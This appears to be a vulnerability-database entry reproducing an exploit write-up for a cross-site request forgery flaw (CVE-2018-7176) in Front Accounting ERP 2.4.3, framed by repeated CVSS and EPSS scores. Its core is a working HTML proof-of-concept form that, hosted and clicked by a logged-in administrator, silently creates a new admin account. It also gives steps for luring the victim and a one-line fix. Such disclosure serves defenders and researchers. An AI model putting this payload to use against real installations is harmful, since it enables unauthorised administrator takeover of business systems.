CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
47.6%
<!--
āā# Exploit Title: Front Accounting ERP 2.4.3 - CSRF
# Date: 16-02-2018
# Exploit Author: Samrat Das
# Contact: http://twitter.com/Samrat_Das93
# Website: https://securitywarrior9.blogspot.in/
# Vendor Homepage: frontaccounting.com
# Version: 2.4.3
# CVE : CVE-2018-7176
# Category: WebApp ERP
1. Description
The application source code is coded in a way which allows malicious
crafted HTML page to be executed directly without any anti csrf
countermeasures.
2. Proof of Concept
1. Visit the application
2. Visit the User Permissions Page.
3. Goto add user, and create a csrf crafted exploit for the same ,
upon hosting it on a server and sending the link to click by victim, it
gets exploited.
Proof of Concept
Steps to Reproduce:
1. Create an HTML Page with the below exploit code:
-->
<html>
<body>
<form action="
http://localhost/frontaccounting/admin/users.php?JsHttpRequest=0-xml"
method="POST" enctype="text/plain">
<input type="hidden" name="show_inactive"
value="&user_id=Newadmin&password=Newadmin&real_name=New%20Admin&phone=&email=&role_id=8&language=C&pos=1&print_profile=&rep_popup=1&ADD_ITEM=Add%20new&_focus=user_id&_modified=0&_confirmed=&_token=Ta6aiT2xqlL2vg8u9aAvagxx&_random=757897.6552143205"
/>
<input type="submit" value="Submit request" />
</form>
</body>
</html>
<!--
2 This hosted page upon being clicked by an logged in admin user will lead
to creation of a new malicious admin user.
3 POCs and steps:
https://securitywarrior9.blogspot.in/2018/02/cross-site-request-forgery-front.html
4. Solution:
Implement anti csrf token code in state changing http requests and validate
it at server side.
-->
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
47.6%